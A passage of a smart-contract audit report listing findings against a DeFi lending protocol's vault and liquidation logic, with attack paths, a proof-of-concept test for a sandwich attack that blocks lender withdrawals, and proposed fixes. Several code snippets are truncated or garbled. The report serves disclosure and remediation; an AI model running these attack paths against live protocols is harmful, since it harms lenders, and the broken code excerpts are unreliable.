The RedstoneOracle#getValueInEth returns price of ASSSETe18 mutiplied by (ASSET/USD) / (ETH/USD)which are gotten from Redstone Oracles and not scaled to 18 decimals as the ASSET.

The problem is that Redstone Oracles are 8 decimals by default which can be seen here Redstone price feeds decimals

Root Cause

The issue itself lies in the normalization to e18 of the returned by the method price.

Internal pre-conditions

No response

External pre-conditions

No response

Attack Path

No response


Financial losses due to inaccuracy in the math.


As per openzeppelin math mulDiv function parameters x = amt: Scaled to 18 decimals. y = assetUsdPrice: 8 decimals. denominator = ethUsdPrice: 8 decimals.

The calculation performed by the getValueInEth function is:

\text{Result} = \frac{\text{amt} \times \text{assetUsdPrice}}{\text{ethUsdPrice}}

Substituting the values:

\text{Result} = \frac{(1 \times 10^{18}) \times (1 \times 10^{8})}{2 \times 10^{8}}

Simplifying the expression:

\text{Result} = \frac{1 \times 10^{26}}{2 \times 10^{8}} = \frac{1 \times 10^{26}}{2 \times 10^{8}} = 0.5 \times 10^{18} = 5 \times 10^{17}

Thus, the function will return:

`\boxed{5 \times 10^{17}}


Consider normalizing the prices of assetUsdPrice, ethUsdPrice to 1e18 OR the asset price to 1e8 and after that the calculation outcome value to 1e18

Issue M-9: The SuperPool vault is not strictly ERC4626 compliant as it should be


The protocol has acknowledged this issue.

Found by

0xAadi, 4gontuk, EgisSecurity, Kalogerone, Obsidian, Ryonen, hash, iamandreiski


The contest README file clearly states that:

Q: Is the codebase expected to comply with any EIPs? Can there be/are there any deviations from the specification?

SuperPool.sol is strictly ERC4626 compliant

No deviations from the specification mentioned. The SuperPool.sol contract is not strictly ERC4626 compliant according to the EIP docs.

Root Cause

The EIP docs for the convertToShares and convertToAssets functions state:

MUST NOT be inclusive of any fees that are charged against assets in the Vault.

and later also state:

The convertTo functions serve as rough estimates that do not account for operation specific details like withdrawal fees, etc. They were included for frontends and applications that need an average value of shares or assets, not an exact value possibly including slippage or other fees. For applications that need an exact value that attempts to account for fees and slippage we have included a corresponding preview function to match each mutable function. These functions must not account for deposit or withdrawal limits, to ensure they are easily composable, the max functions are provided for that purpose.

However, SuperPool's convertToShares and convertToAssets also calculate and include any new fees accrued.

    /// @notice Converts an asset amount to a share amount, as defined by ERC4626
    /// @param assets The amount of assets
    /// @return shares The equivalent amount of shares
    function convertToShares(uint256 assets) public view virtual returns (uint256 shares) {
 @>     (uint256 feeShares, uint256 newTotalAssets) = simulateAccrue();
 @>     return _convertToShares(assets, newTotalAssets, totalSupply() + feeShares, Math.Rounding.Down);

    /// @notice Converts a share amount to an asset amount, as defined by ERC4626
    /// @param shares The amount of shares
    /// @return assets The equivalent amount of assets
    function convertToAssets(uint256 shares) public view virtual returns (uint256 assets) {
@>      (uint256 feeShares, uint256 newTotalAssets) = simulateAccrue();
@>      return _convertToAssets(shares, newTotalAssets, totalSupply() + feeShares, Math.Rounding.Down);

Internal pre-conditions

No response

External pre-conditions

No response

Attack Path

No response


The SuperPool is not strictly EIP-4626 compliant as the README file states it should be.


No response


Don't calculate any new fees accrued in the external convertTo functions:

    function convertToShares(uint256 assets) public view virtual returns (uint256 shares) {
-       (uint256 feeShares, uint256 newTotalAssets) = simulateAccrue();
-       return _convertToShares(assets, newTotalAssets, totalSupply() + feeShares, Math.Rounding.Down);
+       return _convertToShares(assets, totalAssets(), totalSupply(), Math.Rounding.Down);

    function convertToAssets(uint256 shares) public view virtual returns (uint256 assets) {
-       (uint256 feeShares, uint256 newTotalAssets) = simulateAccrue();
-       return _convertToAssets(shares, newTotalAssets, totalSupply() + feeShares, Math.Rounding.Down);
+       return _convertToAssets(shares, totalAssets(), totalSupply(), Math.Rounding.Down);

Issue M-10: An attacker can permanently DOS lender from withdrawing by a sandwich attack


The protocol has acknowledged this issue.

Found by



If a user borrows and repays a loan within the same block they do not pay any interest

Therefore an attacker can sandwich a lender trying to withdraw funds by borrowing those funds, to ensure the lender's tx reverts and then backrunning the lender's withdraw tx by repaying those funds, all within the same block to ensure 0 interest.

Root Cause

No intra-block interest accumulation

Allowing intrablock borrow and repays

Internal pre-conditions

No response

External pre-conditions

No response

Attack Path

  1. Lender sends a tx to withdraw funds
  2. Frontrun (1) by depositing collateral and then borrowing an amount of assets to make (1) revert
  3. Backrun the reverted Tx by repaying the loan all within the same block to ensure no interest accumulates


Attacker can permanently DOS a lender withdrawing their funds, the cost of the attack is only the gas cost of the tx


Add the following to BigTest.t.sol

function test__BorrowerFrontRunsLenderWithdrawal() public {
    uint256 depositAmount = 100 ether;
    uint256 borrowAmount = 100 ether;

    // Lender deposits
    vm.startPrank(lender);, depositAmount);
    asset1.approve(address(pool), depositAmount);
    pool.deposit(linearRatePool, depositAmount, lender);

    // Attacker setup
    (address position, Action memory newPositionAction) = newPosition(user, "test-position");
    positionManager.process(position, newPositionAction);

    // Simulate front-running: 
    // Attacker deposits collateral
    // Attacker borrows all available funds, 200 ether);
    asset2.approve(address(positionManager), 200 ether);
    Action[] memory setupActions = new Action[](2);
    setupActions[0] = addToken(address(asset2));
    setupActions[1] = deposit(address(asset2), 200 ether);
    positionManager.processBatch(position, setupActions);

    Action memory borrowAction = borrow(linearRatePool, borrowAmount);
    positionManager.process(position, borrowAction);

    // Lender attempts to withdraw, which will revert
    vm.expectRevert(abi.encodeWithSelector(Pool.Pool_InsufficientWithdrawLiquidity.selector, linearRatePool, 0, depositAmount));
    pool.withdraw(linearRatePool, depositAmount, lender, lender);

    // Attacker repays the full amount, without paying any interest
    asset1.approve(address(positionManager), borrowAmount);
    Action memory repayAction = Action({
        op: Operation.Repay,
        data: abi.encode(linearRatePool, borrowAmount)
    positionManager.process(position, repayAction);

Console output:

Ran 1 test for test/integration/BigTest.t.sol:BigTest
[PASS] test__BorrowerFrontRunsLenderWithdrawal() (gas: 783412)
Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.61ms (815.19µs CPU time)

Ran 1 test suite in 5.94ms (4.61ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)


  1. Implement intra-block interest accumulation to make this expensive for the attacker
  2. Implement a time interval between deposits and repays

Issue M-11: SuperPool doesn't strictly comply with ERC-4626.


Found by

S3v3ru5, dany.armstrong90


SuperPool.maxWithdraw() and SuperPool.maxRedeem() functions returns incorrect values. This means SuperPool doesn't strictly comply with ERC-4626.

Vulnerability Detail

SuperPool.maxWithdraw() and SuperPool.maxRedeem() functions calls the following _maxWithdraw() function.

    function _maxWithdraw(address _owner, uint256 _totalAssets, uint256 _totalShares) internal view returns (uint256) {
        uint256 totalLiquidity; // max assets that can be withdrawn based on superpool and underlying pool liquidity
        uint256 depositQueueLength = depositQueue.length;
        for (uint256 i; i < depositQueueLength; ++i) {
478:        totalLiquidity += POOL.getLiquidityOf(depositQueue[i]);
        totalLiquidity += ASSET.balanceOf(address(this)); // unallocated assets in the superpool

        // return the minimum of totalLiquidity and _owner balance
483:    uint256 userAssets = _convertToAssets(ERC20.balanceOf(_owner), _totalAssets, _totalShares, Math.Rounding.Down);
484:    return totalLiquidity > userAssets ? userAssets : totalLiquidity;

As can be seen, the above function use liquidity of pool as withdrawable maximum assets in L478.

On the other hand, SuperPool.withdraw() and SuperPool.redeem() function calls _withdraw() function and _withdraw() function calls in turn the following _withdrawFromPools() function to withdraw assets from deposited pools.

548:function _withdrawFromPools(uint256 assets) internal {
        uint256 assetsInSuperpool = ASSET.balanceOf(address(this));

        if (assetsInSuperpool >= assets) return;
        else assets -= assetsInSuperpool;

        uint256 withdrawQueueLength = withdrawQueue.length;
        for (uint256 i; i < withdrawQueueLength; ++i) {
            uint256 poolId = withdrawQueue[i];
            // withdrawAmt -> max assets that can be withdrawn from the underlying pool
            // optimistically try to withdraw all assets from this pool
            uint256 withdrawAmt = assets;

            // withdrawAmt cannot be greater than the assets deposited by the pool in the underlying pool
            uint256 assetsInPool = POOL.getAssetsOf(poolId, address(this));
563:        if (assetsInPool < withdrawAmt) withdrawAmt = assetsInPool;

            // withdrawAmt cannot be greater than the underlying pool liquidity
            uint256 poolLiquidity = POOL.getLiquidityOf(poolId);
567:        if (poolLiquidity < withdrawAmt) withdrawAmt = poolLiquidity;

            if (withdrawAmt > 0) {
                try POOL.withdraw(poolId, withdrawAmt, address(this), address(this)) {
                    assets -= withdrawAmt;
                } catch { }

            if (assets == 0) return;

        // We explicitly check assets == 0, and if so return, otherwise we revert directly here
        revert SuperPool_NotEnoughLiquidity(address(this));

As can be seen, the above function use minimum of assetsInPool and poolLiquidity as withdrawable maximum assets (L563 and L567) which is less than the value of _maxWithdraw() function.


  1. pool1 has 100 total deposited shares, 1000 total deposited assets and 500 total borrowed assets. So pool1 has 1000 - 500 liquidity.
  2. pool2 has 100 total deposited shares, 1000 total deposited assets and 1000 total borrowed assets. So pool2 has 1000 - 1000 = 0 liquidity.
  3. SuperPool has 10 shares in the pool1 and 10 shares in the pool2.
  4. SuperPool has 100 total supply(total shares) and a user has 100 shares in SuperPool which means that the user has 100% shares of SuperPool.
  5. Therefore the user and SuperPool has 10 * 1000 / 100 + 10 * 1000 / 100 = 200 total assets in the underlying pools which is equal to userAssets of L483 and assets of L548.
  6. totalLiquidity of L484 is 0 + 500 = 500 and _maxWithdraw() returns min(200, 500) = 200.
  7. withdrawAmt of L567 is min(500, 100) = 100 for pool1 and min(0, 100) = 0 for pool2. Therefore _withdrawFromPools() function withdraw totally 100 assets from underlying pools which is smaller than 200 of _maxWithdraw() function.


The stated as follows.

SuperPool.sol is strictly ERC4626 compliant

However SuperPool doesn't strictly comply with ERC-4626.

Code Snippet

Tool used

Manual Review


Modify SuperPool._maxWithdraw() function as follows.

    function _maxWithdraw(address _owner, uint256 _totalAssets, uint256 _totalShares) internal view returns (uint256) {
        uint256 totalLiquidity; // max assets that can be withdrawn based on superpool and underlying pool liquidity
        uint256 depositQueueLength = depositQueue.length;
        for (uint256 i; i < depositQueueLength; ++i) {
--          totalLiquidity += POOL.getLiquidityOf(depositQueue[i]);
++          totalLiquidity += Math.min(POOL.getLiquidityOf(depositQueue[i]), POOL.getAssetsOf(depositQueue[i], address(this)));
        totalLiquidity += ASSET.balanceOf(address(this)); // unallocated assets in the superpool

        // return the minimum of totalLiquidity and _owner balance
        uint256 userAssets = _convertToAssets(ERC20.balanceOf(_owner), _totalAssets, _totalShares, Math.Rounding.Down);
        return totalLiquidity > userAssets ? userAssets : totalLiquidity;

Issue M-12: Incorrect check in validateBadDebt function


The protocol has acknowledged this issue.

Found by

Smacaud, bareli, pseudoArtist


The validateBadDebt functions allows positions where assets equal debt to be classified as not in bad debt. This behavior affects the liquidateBadDebt function, which relies on this validation to determine whether a position should be liquidated.

Vulnerability Detail

The validateBadDebt function only reverts when totalAssetValue exceeds totalDebtValue depicting no bad debt

function validateBadDebt(address position) external view { // ......Existing codes..... if (totalAssetValue > totalDebtValue) revert RiskModule_NoBadDebt(position); }

However, if totalAssetValue = totalDebtValue, the function does not revert and incorrectly considers the position as being in bad debt.

This can lead to case where totalAssetValue = totalDebtValue is being considered as bad debt which is technically not. The owner can go ahead to liquidate the position thinking its bad debt because of the incorrect check.


The implementation could lead to unfair liquidations of positions that are technically not in bad debt (case of totalAssetValue = totalDebtValue )

Code Snippet

Tool used

Manual Review


Adjust the validateBadDebt function to handle the scenario where totalAssetValue is equal to totalDebtValue more accurately.

Issue M-13: SuperPool fails to correctly deposit into pools


Found by

0xDazai, Atharv, Bigsam, KupiaSec, Yuriisereda


When a depositor calls SuperPool::deposit() the internal _deposit() is called, it checks if astTotalAssets + assets > superPoolCap , transfers the assets from msg.sender to superPool address , mints shares to receiver and then calls _supplyToPools().


    function _deposit(address receiver, uint256 assets, uint256 shares) internal {
        // assume that lastTotalAssets are up to date
        if (lastTotalAssets + assets > superPoolCap) revert SuperPool_SuperPoolCapReached();
        // Need to transfer before minting or ERC777s could reenter.
        ASSET.safeTransferFrom(msg.sender, address(this), assets);
        ERC20._mint(receiver, shares);
        _supplyToPools(assets);    <<<@
        lastTotalAssets += assets;
        emit Deposit(msg.sender, receiver, assets, shares);


    function _supplyToPools(uint256 assets) internal {
        uint256 depositQueueLength = depositQueue.length;
        for (uint256 i; i < depositQueueLength; ++i) {
            uint256 poolId = depositQueue[i];
            uint256 assetsInPool = POOL.getAssetsOf(poolId, address(this));  <<<@

            if (assetsInPool < poolCapFor[poolId]) {
                uint256 supplyAmt = poolCapFor[poolId] - assetsInPool;
                if (assets < supplyAmt) supplyAmt = assets;
                ASSET.forceApprove(address(POOL), supplyAmt);

                // skip and move to the next pool in queue if deposit reverts
                try POOL.deposit(poolId, supplyAmt, address(this)) {
                    assets -= supplyAmt;
                } catch { }

                if (assets == 0) return;

_supplyToPools() loops through all pools, depositing assets sequentially until the cap is reached. When it checks if the cap of the poolId is reached instead of comparing the total deposit assets amount of the poolId with the pool.poolCap to see if there is a free space for depositing into, it only compares the total assets deposited by the SuperPool address into the poolId with poolCapFor[poolId] mapping set by the owner of the SuperPool when the pool was added by calling addPool() and subtract the result with the wanted asset value for depositing.

Vulnerability Detail

When calculating if there is a free space for depositing into the poolId by calling uint256 assetsInPool = POOL.getAssetsOf(poolId, address(this)); it can return bigger value than the actual one left in the pool.poolCap , increasing the chances of deposit() function for the poolId to revert, unsuccessfully filling up the left space in the poolId before moving forward to the next poolId if there is any asset amount left.


Fails to correctly fill up assets into pools even if there is any free space to do so.

Code Snippet

    function _supplyToPools(uint256 assets) internal {
        uint256 depositQueueLength = depositQueue.length;
        for (uint256 i; i < depositQueueLength; ++i) {
            uint256 poolId = depositQueue[i];
            uint256 assetsInPool = POOL.getAssetsOf(poolId, address(this));

            if (assetsInPool < poolCapFor[poolId]) {
                uint256 supplyAmt = poolCapFor[poolId] - assetsInPool;
                if (assets < supplyAmt) supplyAmt = assets;
                ASSET.forceApprove(address(POOL), supplyAmt);

                // skip and move to the next pool in queue if deposit reverts
                try POOL.deposit(poolId, supplyAmt, address(this)) {
                    assets -= supplyAmt;
                } catch { }

                if (assets == 0) return;


Lets look at the following example:

  1. Owner of poolId = 1 creates the pool and sets poolCap = 2000 USDC
  2. In SuperPool poolId = 1 is added to the contract with poolCapFor[poolId] = 1500 .
  3. Alice deposits 1000 USDC to poolId = 1 by calling SuperPool.deposit(). a) Now the poolCapFor[poolId] free space is 500 USDC. b) And poolCap free space for poolId = 1 is 1000 USDC.
  4. Bob calls directly Pool.deposit() for poolId = 1 with 600 USDC , and poolCap free space for poolId = 1 is 400USDC.
  5. John calls SuperPool.deposit() with 500 USDC and it will try to deposit into poolId = 1 because poolCapFor[poolId] free space = 500 , but poolCap free space = 400, the tx will revert for that poolId and will move forward and try to deposit into the next pool even when there is free space for 400 USDC .

Tool used

Manual Review


In Pool.sol add :

+    function getPoolCap(uint256 poolId) public view returns(uint256) {
+        return poolDataFor[poolId].poolCap;
+    }

And in SuperPool.sol

    function _supplyToPools(uint256 assets) internal {
        uint256 depositQueueLength = depositQueue.length;
        for (uint256 i; i < depositQueueLength; ++i) {
            uint256 poolId = depositQueue[i];
+            uint256 capLeft = pool.getPoolCap(poolId) - pool.getTotalAssets(poolId);
            uint256 assetsInPool = POOL.getAssetsOf(poolId, address(this));

                if (assetsInPool < poolCapFor[poolId]) {
                uint256 supplyAmt = poolCapFor[poolId] - assetsInPool;
                if (assets < supplyAmt) supplyAmt = assets;
+                If(supplyAmt > capLeft){
+                    supplyAmt = capLeft;
                ASSET.forceApprove(address(POOL), supplyAmt);
+                } else {
+                    ASSET.forceApprove(address(POOL), supplyAmt);
+                }
                // skip and move to the next pool in queue if deposit reverts
                try POOL.deposit(poolId, supplyAmt, address(this)) {
                    assets -= supplyAmt;
                } catch { }

                if (assets == 0) return;

Issue M-14: Denial of Service (DoS) Vulnerability in SuperPool Withdrawal Due to Precision Loss (shares=0) in Pool Share Calculations when we call withdraw in pool contract.


Found by



The SuperPool contract contains a vulnerability that can cause a Denial of Service (DoS) for users attempting to withdraw their funds. Although the SuperPool may have enough liquidity, precision loss in pool share calculations can lead to failed withdrawals, preventing users from accessing their funds.

Vulnerability Detail

When a user attempts to withdraw funds from the SuperPool, the _withdrawFromPools function loops through the various pools to gather the required assets. The function calls the withdraw function in each pool contract, which calculates the deposit shares to burn. Due to precision loss, the calculation may result in zero shares to burn, causing the withdrawal to revert. This issue occurs even when the pool has sufficient liquidity to cover the transaction, leading to a failed withdrawal despite the availability of funds.

    function _withdraw(address receiver, address owner, uint256 assets, uint256 shares) internal {

@audit>> calll >>        _withdrawFromPools(assets);

    if (msg.sender != owner) ERC20._spendAllowance(owner, msg.sender,

    function _withdrawFromPools(uint256 assets) internal {
        uint256 assetsInSuperpool = ASSET.balanceOf(address(this));

        if (assetsInSuperpool >= assets) return;
        else assets -= assetsInSuperpool;

// loop through  
 uint256 withdrawQueueLength = withdrawQueue.length;
        for (uint256 i; i < withdrawQueueLength; ++i) {

   @audit>> as long as amount is greater than 0 even if this is 1 wei >>    if (withdrawAmt > 0) {

                                                             try POOL.withdraw(poolId, withdrawAmt, address(this), address(this)) {

   @audit>> reduce asset for the next withdrawal>>                 assets -= withdrawAmt;

  } catch { }

            if (assets == 0) return;

The vulnerability arises because the withdraw function in the pool contract uses the following logic:

    @audit>> if 1 wei or less enough shares = 0 >>       shares = _convertToShares(assets, pool.totalDepositAssets, pool.totalDepositShares, Math.Rounding.Up);

// check for rounding error since convertToShares

   @audit>> Revert >>  if (shares == 0) revert Pool_ZeroShareRedeem(poolId, assets);

NOTE - OpenZeppelin Math.sol round up only when the multiplication of the numerators are greater than 1 else 0 is still returned.

     * @notice Calculates x * y / denominator with full precision, following the selected rounding direction.
    function mulDiv(uint256 x, uint256 y, uint256 denominator, Rounding rounding) internal pure returns (uint256) {
        uint256 result = mulDiv(x, y, denominator);

 @AUDIT>>     if (rounding == Rounding.Up && mulmod(x, y, denominator) > 0) {

                   result += 1;
        return result;

If the calculated shares is zero due to precision loss, the function reverts, causing the entire withdrawal process in the SuperPool to fail.


The inability to withdraw from the SuperPool, even when sufficient liquidity exists, can cause significant disruption for users. This DoS vulnerability can prevent users from accessing their funds.


Super pool A has 3 pools 1, 2 and 3.

Liquidity in each pool

                                           Superpool holds asset -- 30e18

assets + interest

                                           Pool 1 -  18.573457857309736565e18

                                           Pool 2 - 1.426542142690263434e18

                                           Pool 3 - 10e18

Total available asset in the pool - 59.999999999999999999e18.

User calls to withdraw - 50e18 of their asset in superppool.

We loop through each Process-

                       1. assets -= assetsInSuperpool;

assets = 20e18.

                          2.  assets -= withdrawAmt;

assets =1.426542142690263435e18

                          3.  assets -= withdrawAmt;

assets = 1

  if (withdrawAmt > 0) {

      try POOL.withdraw(poolId, withdrawAmt, address(this), address(this))

we attempt to withdraw this 1 wei.

                        **### _Pool 3._** 

 function withdraw(
        uint256 poolId,
        uint256 assets,
        address receiver,
        address owner
    ) public returns (uint256 shares) {
        PoolData storage pool = poolDataFor[poolId];

        // update state to accrue interest since the last time accrue() was called
        accrue(pool, poolId);

        shares = _convertToShares(assets, pool.totalDepositAssets, pool.totalDepositShares, Math.Rounding.Up);
        // check for rounding error since convertToShares rounds down
        if (shares == 0) revert Pool_ZeroShareRedeem(poolId, assets);
                     pool.totalDepositAssets = 18.9e18 ,

                     pool.totalDepositShares = 18.2e18 ,

                     assets= 1 wei.

                     Convert to shares = (1 * 18.2 e18)/ 18.9 e18 =  0.96296296296296296296296296296296= 0.

                     OpenZeppelin  Math.sol will not round to 1 because the answer is not greater than 0. thus this will revert.

Also note an attacker can also play with the asset in the Superpool by depositing dust amounts to ensure that the amount in the pool remains 1 wei at a point when we make external calls and cause a reversion. This is possible because we use address this to check the amount in the Superpool contract.

Code Snippet

Tool used

Manual Review


To mitigate this issue, modify the catch block in the _withdrawFromPools function to check if the pool liquidity is greater than the amount to be collected. If so, collect the pool liquidity and transfer it to the user from the contract. This change ensures that even if precision loss occurs, the user can still withdraw the available liquidity. Here is the recommended modification:

  // withdrawAmt cannot be greater than the underlying pool liquidity
            uint256 poolLiquidity = POOL.getLiquidityOf(poolId);
            if (poolLiquidity < withdrawAmt) withdrawAmt = poolLiquidity;

            if (withdrawAmt > 0) {
                try POOL.withdraw(poolId, withdrawAmt, address(this), address(this)) {
                    assets -= withdrawAmt;
                } catch {
++    if (poolLiquidity > withdrawAmt) {
++         withdrawAmt = poolLiquidity;
++    POOL.withdraw(poolId, withdrawAmt, address(this), address(this));
++    assets = 0;}


This adjustment will allow withdrawals to succeed even when precision loss leads to zero shares being calculated, thus preventing the DoS vulnerability.

Issue M-15: Incorrect Calculation of _minRequestedValue Exposes Healthy Positions to Liquidation and Prevents Full Borrowing/Withdrawal


Found by



The _getMinReqAssetValue function incorrectly calculates the minimum required asset value, leading to an overestimation of minReqAssetValue.

Vulnerability Detail

    function isPositionHealthy(address position) public view returns (bool) {
        // some code ... 
   >>   uint256 minReqAssetValue = _getMinReqAssetValue(debtPools, debtValueForPool, positionAssets, positionAssetWeight, position);
   >>   return totalAssetValue >= minReqAssetValue;

    function _getMinReqAssetValue(
        uint256[] memory debtPools,
        uint256[] memory debtValuleForPool,
        address[] memory positionAssets,
        uint256[] memory wt,
        address position
    ) internal view returns (uint256) {
        uint256 minReqAssetValue;

        // O(pools.len * positionAssets.len)
        uint256 debtPoolsLength = debtPools.length;
        uint256 positionAssetsLength = positionAssets.length;
        for (uint256 i; i < debtPoolsLength; ++i) {
            for (uint256 j; j < positionAssetsLength; ++j) {
                uint256 ltv = riskEngine.ltvFor(debtPools[i], positionAssets[j]);

                // revert with pool id and the asset that is not supported by the pool
                if (ltv == 0) revert RiskModule_UnsupportedAsset(position, debtPools[i], positionAssets[j]);

                minReqAssetValue += debtValuleForPool[i].mulDiv(wt[j], ltv, Math.Rounding.Up);

The function calculates $\text{MAV}$ as follows:

$$ \text{MAV} = \sum_{j=0}^{\text{PAL}-1} \left( \left\lceil \frac{DV \cdot w_j}{ltv_j} \right\rceil \right) $$

  1. First equation (how the code is currently implemented) could be simplified to this:
    \text{MAV} = DV \times {\sum_{j=0}^{n} \frac{w_j}  {\text{ltv}_j}}
  2. The above expression is not equal to the total value divided by the weighted average ltv (how it should be calculated):
    \text{MAV} = \text{DV} \times \sum_{j=0}^{n} \frac{1}{ (\text{ltv}_j \times w_j)}
  3. The summation:
    \sum_{j=0}^{n} \frac{w_j}{\text{ltv}_j} = \frac{w_0}{\text{ltv}_0} + \cdots + \frac{w_n}{\text{ltv}_n}
  4. This expression is not equal to:

    \frac{1}{\text{ltv}_0 \times w_0 + \cdots + \text{ltv}_n \times w_n}

    Example :

    • let's explain the issue from an easy and logical perspective with the followign example :

    • Consider a user's position with the following characteristics:

    • Pool: poolId-A

    • Assets:

    • asset-1: 100$ (LTV 90%)

    • asset-2: 100$ (LTV 50%)

    • Total collateral value: 200$

(100$ * 90%) + (100$ * 50%) = 90$ + 50$ = 140$


Manual Review


To fix this, the protocol needs to implement the correct formula by dividing the pool debt value by the weighted-averaged ltv

function _getMinReqAssetValue(
    uint256[] memory debtPools,
    uint256[] memory debtValuleForPool,
    address[] memory positionAssets,
    uint256[] memory wt,
    address position
) internal view returns (uint256) {
    uint256 minReqAssetValue;
-   uint256 weigtedAvgLtv;

    // O(pools.len * positionAssets.len)
    uint256 debtPoolsLength = debtPools.length;
    uint256 positionAssetsLength = positionAssets.length;
    for (uint256 i; i < debtPoolsLength; ++i) {
-       weigtedAvgLtv = 0;
+       uint256 weightedAvgLtv = 0;
        for (uint256 j; j < positionAssetsLength; ++j) {
            uint256 ltv = riskEngine.ltvFor(debtPools[i], positionAssets[j]);

            // revert with pool id and the asset that is not supported by the pool
            if (ltv == 0) revert RiskModule_UnsupportedAsset(position, debtPools[i], positionAssets[j]);

-           minReqAssetValue += wt[j].mulDiv(ltv,1e18, Math.Rounding.Up);
+           weightedAvgLtv += wt[j].mulDiv(ltv, 1e18, Math.Rounding.Down);
-       minReqAssetValue += debtValuleForPool[i].mulDiv(1e18,weigtedAvgLtv,Math.Rounding.Up);
+       minReqAssetValue += debtValuleForPool[i].mulDiv(1e18, weightedAvgLtv, Math.Rounding.Up);

    if (minReqAssetValue == 0) revert RiskModule_ZeroMinReqAssets();
    return minReqAssetValue;

Using this corrected implementation with the example:

For poolId-A with 140$ debt:

This calculation correctly results in the expected minRequiredAssetValue of 200$.



1 comment(s) were left on this issue during the judging contest.

Nihavent commented:

This is a great explanation of why the attacks in 299 and 558 are possible. If I'm not mistaken, this fix also prevents those attacks.

Issue M-16: The liquidation will revert if the left amount in debt < MIN_DEBT


Found by



This bug was firstl discovered in the Guardian Audit report H-17:Users Can Avoid Liquidations. The sponsor have marked this issue as resolved, and have asked fellow watsons to also check if all the issues from the guardian report, that were marked as resolved, have been fully mitigated. In this case, the bug still exists.

Vulnerability Detail

At the end of liquidation, the pool.repay() function will be called

@>    pool.repay(poolId, position, amt);
    // update position to reflect repayment of debt by liquidator
    Position(payable(position)).repay(poolId, amt);

The repay() function however still implements the same MIN_DEBT check, which will lead to the exact same scenario intended to be mitigated.

    function repay(uint256 poolId, address position, uint256 amt) external returns (uint256 remainingShares) {
        // revert if repaid amt is too small
        if (borrowShares == 0) revert Pool_ZeroSharesRepay(poolId, amt);

        // check that final debt amount is greater than min debt
        remainingShares = borrowSharesOf[poolId][position] - borrowShares;
        if (remainingShares > 0) {
            uint256 newBorrowAssets = _convertToAssets(
                remainingShares, pool.totalBorrowAssets - amt, pool.totalBorrowShares - borrowShares, Math.Rounding.Down
@>            if (_getValueOf(pool.asset, newBorrowAssets) < minDebt) {
@>                revert Pool_DebtTooLow(poolId, pool.asset, newBorrowAssets);
@>            }


As Mentioned in the guardian report, this issue exposes the protocol of risk the accumulation of bad debt and liquidation reverting. Please also notice, that the likeablity of this scenario increases the more unhealthy the position, leading to profitable liquidation attempts reverting. Also noting that sentiment is a leveraged lending protocol, the risk of the accumulation of such positions is significant

Code Snippet 3

Tool used

Manual Review


The simplest way to mitigate this, is to refactor the code in repay() to an internal _repay() function that recieves an extra force argument and to bypass this check if the this force value is set to true

    function repay(uint256 poolId, address position, uint256 amt) external returns (uint256 remainingShares) {
    function reduceDebt(uint256 poolId, address position, uint256 amt) external returns (uint256 remainingShares) {

Issue M-17: Missing 'minDebt' check from liquidation can lead to bad debt accumulation


Found by



The missing minDebt check from PositionManager.liquidate can leave positions with a small amount of debt that is unappealing to further liquidations and can lead to accumulation of bad debt.

Root Cause

Protocol implements a borrowAssets < minDebt check in Pool.borrow (link) and Pool.repay (link2), but this check is missing from liquidations.

Internal pre-conditions

  1. An unhealthy position must exist.

External pre-conditions


Attack Path

  1. An liquidator/attacker observes an unhealthy positions and calls PositionManager.liquidate and repays just enough debt such that after liquidations 0 < the new position's debt < minDebt.
  2. After 1st liquidation position became sound with debt < assets deposited.
  3. After some time, due to market conditions, same position became unhealthy again. But due to gas prices and small position the liquidators are disincentivized to liquidate it.
  4. Due to further asset's prices decrease, position accumulate bad debt and lenders must take a loss. Since the protocol can be deployed to Ethereum L1 small


Protocol can have many positions with debt < minDebt. Over time, since there will be no incentive for liquidators to liquidate small underwater positions given the gas cost, protocol accumulates bad debt at the detrimental of lenders.


No response


Ensure that liquidators liquidate entire position's debt or, that the remaining debt after liquidation is bigger than minDebt.

Issue M-18: Liquidator will incur losses during liquidation leading to bad debt accumulation


Found by



The lack of handling for bad debt in PositionManager.sol will cause an economic disincentive for liquidators, leading to potential bad debt accumulation for the protocol as liquidators will avoid liquidating positions with insufficient collateral.

Root Cause

In PositionManager.sol: _repayPositionDebt the function assumes full debt repayment by the liquidator without considering the available collateral.

Internal pre-conditions

  1. A position must have debt exceeding its collateral value.
  2. The liquidator must attempt to liquidate the position.

External pre-conditions

  1. The value of the collateral must drop significantly, causing the debt to exceed the collateral value.

Attack Path

  1. A position's collateral value drops below its debt value.
  2. A liquidator attempts to liquidate the position.
  3. The liquidator is required to repay the full debt amount, which exceeds the collateral value.
  4. The liquidator incurs a loss, making it economically unfeasible to proceed with the liquidation.
  5. Liquidators avoid liquidating such positions, leading to bad debt accumulation in the protocol.


The protocol suffers from bad debt accumulation as liquidators avoid liquidating positions with insufficient collateral, leading to potential financial instability.


  1. Assume a position has a debt of 1000 USDC and collateral worth 800 USDC.
  2. The liquidator attempts to liquidate the position.
  3. The liquidator is required to repay the full 1000 USDC debt.
  4. The liquidator incurs a loss of 200 USDC (1000 USDC debt - 800 USDC collateral).
  5. Liquidators avoid such liquidations, leading to bad debt accumulation.


Modify the _repayPositionDebt function to handle partial debt repayment based on available collateral. This ensures liquidators only repay what is economically feasible, preventing bad debt accumulation.

function _repayPositionDebt(address position, DebtData[] calldata debtData) internal {
    // sequentially repay position debts
    // assumes the position manager is approved to pull assets from the liquidator
    uint256 debtDataLength = debtData.length;
    for (uint256 i; i < debtDataLength; ++i) {
        uint256 poolId = debtData[i].poolId;
        address poolAsset = pool.getPoolAssetFor(poolId);
        uint256 amt = debtData[i].amt;
        uint256 positionDebt = pool.getBorrowsOf(poolId, position);

        // if the passed amt is type(uint256).max assume repayment of the entire debt
        if (amt == type(uint256).max) amt = positionDebt;

+       // calculate the maximum repayable amount based on the liquidator's balance
+       uint256 liquidatorBalance = IERC20(poolAsset).balanceOf(msg.sender);
+       uint256 repayAmount = amt > liquidatorBalance ? liquidatorBalance : amt;

-       // transfer debt asset from the liquidator to the pool
-       IERC20(poolAsset).safeTransferFrom(msg.sender, address(pool), amt);
-       // trigger pool repayment which assumes successful transfer of repaid assets
-       pool.repay(poolId, position, amt);
-       // update position to reflect repayment of debt by liquidator
-       Position(payable(position)).repay(poolId, amt);

+       // transfer debt asset from the liquidator to the pool
+       IERC20(poolAsset).safeTransferFrom(msg.sender, address(pool), repayAmount);
+       // trigger pool repayment which assumes successful transfer of repaid assets
+       pool.repay(poolId, position, repayAmount);
+       // update position to reflect repayment of debt by liquidator
